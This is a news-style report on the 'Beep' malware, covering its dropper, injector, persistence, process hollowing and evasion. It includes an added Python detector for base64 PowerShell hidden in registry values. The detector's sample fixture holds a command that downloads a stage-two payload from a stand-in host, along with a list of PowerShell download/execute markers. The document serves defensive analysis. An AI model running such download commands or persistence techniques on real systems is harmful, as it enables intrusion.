Cybersecurity researchers have uncovered a new piece of malware that is being tracked as 'Beep.' It has been built with a wide range of features that make it highly resistant to detection and analysis by security software. Although it is still in development and lacks some essential components, Beep already allows threat actors to remotely download and execute additional payloads on devices it has compromised. Details of the threat were released in a report published by infosec experts.
This makes Beep a highly concerning threat for organizations and individuals, as it can grant attackers unauthorized access to sensitive information and control over the affected devices. Individuals and organizations should keep their security software up to date and stay vigilant for any signs of suspicious activity on their devices.
The Beep Malware Can Pose a Significant Danger to Targeted Victims
Beep is designed to collect sensitive information from the compromised device. It consists of three main components: a dropper, an injector and the payload.
The dropper, also known as 'big.dll,' creates a new Registry key containing a value called 'AphroniaHaimavati.' This value holds a base64-encoded PowerShell script, which a scheduled task on the device launches every 13 minutes.
When the script runs, it downloads data and saves it as an injector called AphroniaHaimavati.dll. The injector applies various anti-debugging and anti-VM (virtual machine) techniques and then injects the payload into a legitimate system process, 'WWAHost.exe,' using process hollowing, which helps evade detection by security tools running on the host.
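The persistence chain above (a base64-encoded PowerShell script kept in a registry value and launched by a scheduled task every 13 minutes) is something a defender can hunt for in exported artifacts. The following Python is an added example, not code from the report or from Beep itself: it decodes base64 registry values that turn out to be PowerShell and reads the repetition interval from Task Scheduler XML. The value name and the 13-minute interval come from the report; the registry key path, script body and URL in the samples are constructed placeholders, since the report does not name the key.

```python
import base64
import re
import xml.etree.ElementTree as ET
# Substrings that mark decoded text as PowerShell rather than arbitrary base64 data.
PS_MARKERS = ("invoke-", "iex", "downloadstring", "-outfile", "start-process", "new-object")
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"  # Task Scheduler XML namespace

def decode_base64_script(raw):
    """Return the PowerShell text hidden in a base64 string, or None if there is none."""
    try:
        data = base64.b64decode(raw, validate=True)
    except (ValueError, TypeError):
        return None
    for enc in ("utf-16-le", "utf-8"):  # -EncodedCommand uses UTF-16LE; also try plain UTF-8
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text) and any(m in text.lower() for m in PS_MARKERS):
            return text
    return None

def find_encoded_powershell(reg_export):
    """Walk a .reg export; return (key, value_name, decoded_script) for every value hiding a script."""
    hits, key = [], None
    for line in reg_export.splitlines():
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        m = re.match(r'^"([^"]+)"="([^"]*)"$', line)
        if m and (script := decode_base64_script(m.group(2))):
            hits.append((key, m.group(1), script))
    return hits

def repetition_minutes(task_xml):
    """Return the task trigger's repetition interval in minutes (PT13M -> 13), or None."""
    node = ET.fromstring(task_xml).find(f".//{TASK_NS}Repetition/{TASK_NS}Interval")
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?", node.text.strip()) if node is not None else None
    return int(m.group(1) or 0) * 60 + int(m.group(2) or 0) if m else None

# Constructed samples. The value name and the 13-minute interval come from the report; the key
# path, script body and URL are placeholders, not real Beep artifacts.
SAMPLE_SCRIPT = "Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile AphroniaHaimavati.dll"
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00", "",
    r"[HKEY_CURRENT_USER\Software\PLACEHOLDER_KEY]",
    '"AphroniaHaimavati"="%s"' % base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode(),
    '"Harmless"="aGVsbG8="',  # valid base64 of "hello", but not a script: must not be flagged
])
SAMPLE_TASK = f"""<Task xmlns="{TASK_NS[1:-1]}"><Triggers><TimeTrigger>
<Repetition><Interval>PT13M</Interval></Repetition></TimeTrigger></Triggers></Task>"""
```

On a live host the same two functions can be fed the output of `reg export` and `schtasks /query /xml`; a short repetition interval combined with an encoded script in the registry is the pairing worth escalating.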
The primary payload is responsible for collecting data from the compromised device and encrypting it. It then attempts to send the encrypted data to a hardcoded command-and-control (C2) server. During analysis, the hardcoded C2 address was offline, but the malware kept trying to connect, even after 120 failed attempts.
The Beep Malware is Heavily Focused on Remaining Undetected
The Beep malware implements multiple evasion techniques throughout its execution flow, making detection and analysis by security software and infosec researchers difficult. These techniques include string deobfuscation, a system language check, debugger detection, and anti-VM and anti-sandbox measures, among others. The injector component adds several further anti-debugging and detection-evasion techniques of its own. Beep's focus on evasion indicates that it may be an upcoming threat to watch out for, despite its limited operations in the wild at present.